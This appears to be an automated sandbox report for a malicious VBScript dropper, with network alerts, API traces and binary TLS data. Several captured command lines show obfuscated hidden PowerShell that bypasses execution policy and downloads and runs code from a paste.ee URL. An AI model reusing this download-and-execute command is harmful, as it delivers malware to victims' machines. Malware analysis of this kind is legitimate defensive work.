Summary | ZeroBOX

vnm.txt.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 July 29, 2024, 5:03 p.m. July 29, 2024, 5:05 p.m.
Size 8.3KB
Type ASCII text, with CRLF line terminators
MD5 44c6625fcc0a287d7d618359268c9abf
SHA256 a0b0138b7c5f2160cb3a07799b45dafd20f3909ac89744ef97efe193f98e3170
CRC32 37506482
ssdeep 192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeit0kusM8B:Z80nK
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
paste.ee 104.21.84.67
IP Address Status Action
164.124.101.2 Active Moloch
172.67.187.200 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:63709 -> 164.124.101.2:53 2054041 ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee) Misc activity
TCP 192.168.56.102:49164 -> 172.67.187.200:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.102:49164 -> 172.67.187.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49164
172.67.187.200:443
C=US, O=Google Trust Services, CN=WE1 CN=paste.ee db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: IsPublic IsSerial Name BaseType
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x0000002b
1 1 0

WriteConsoleW

buffer: Invoke-Expression : The '<' operator is reserved for future use.
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: At line:1 char:4
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/DIWK2/
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: n], ParseException
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: mands.InvokeExpressionCommand
console_handle: 0x00000093
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322790
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003224d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003224d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003224d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003220d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003220d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003220d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003220d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003220d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003220d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00321bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00321bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00321bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003226d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00322590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00321c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00321c90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003bf390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/d/DIWK2/0
request GET https://paste.ee/d/DIWK2/0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02642000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02643000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02644000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02645000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02646000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: Cmd.exe
parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
filepath: Cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received Wf§LÙÇ)0À°[ØíÓPÂ}±W-ï.tÀÐDOWNGRD Á艹 ü2Ï¥Žõª³(QÞ#¤ÏÝô |¾vÔxfë¬À ÿ 
Data received  Ò
Data received Î Ë¡0‚0‚B ­ú«>Þ9ÙdïÖ.¬0 *†HÎ=0;1 0 UUS10U Google Trust Services1 0 UWE10 240622144918Z 240920144917Z010Upaste.ee0Y0*†HÎ=*†HÎ=BA>Ó-z V/¥\ˆô]Oàê Ðé¡÷!f žÄr œq%þ.Mç7bíþKîç°¸—µíÁÂzÑÐ|O] ?’£‚M0‚I0Uÿ€0U% 0 +0 Uÿ00UBz~‹<"ñã6¸ri¸N bW{‰0U#0€w’5gÄÿ¨Ì©æ{ـy{̓ù80^+R0P0'+0†http://o.pki.goog/s/we1/rfo0%+0†http://i.pki.goog/we1.crt0U0‚paste.ee‚ *.paste.ee0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/we1/t4Y_tS4oQ9A.crl0‚ +ÖyõòðußáV몯µœ†q¨À2N®VÙn§õ¥jÑÁ;¾R\@£BÏF0D ;2Áj³,ÛÊŽø‡Œ¢<U×+vªÇëÑäÇÝ1“r¤%¤ "8} ԓ\åIC¼‚PW:Äo‡˜¤Ñ×ì㕓™æwvÿˆ? ¶û•QÂaÌõ‡º4´¤Í»)ÜhB ŸægLZ:t@£B3H0F!çSaÔ))˜,}8 b?7î›k&æ›õј‚õ÷!†œ‘þµ¦1 ¨¾ yÞ²*ªZxŸ¦‹$h–]ÞvG0 *†HÎ=I0F!ÄsHv¬N–À°ú@àOœž•/Ø\ÜÜÞstÝí…V!àMv$” å,´X¡‰šP›·ÐïÿB±õ0ôj‹eK£0‚Ÿ0‚% ów—,"Jv]¶Ö…ã0 *†HÎ=0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWE10Y0*†HÎ=*†HÎ=BoÍ:þgWGL!…@ÂG]»XG@Á\…Æ7çÕ|í†K›Ù×¥ ø˜ÄÆèžÿY,&˜õæ&%»úV£þ0û0Uÿ†0U%0++0Uÿ0ÿ0Uw’5gÄÿ¨Ì©æ{ـy{̓ù80U#0€€LÖëtÿI6£ÕØüµ>Åjð”Œ04+(0&0$+0†http://i.pki.goog/r4.crt0+U$0"0   †http://c.pki.goog/r/r4.crl0U  0 0g 0 *†HÎ=h0e1ç«QÖ÷C•ÎuþÑ”ÕÌ@Az&¾Ø ó2-=®#HR>dy¯õ¦,nU±0&‰Ìhb牫~èÖD~ãLI¿l€b4¸²¡~:ˆP¼§ˆ Ÿ}sìRAMîâV~0‚z0‚b å0¿3C¾Ý‚I=Š0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root 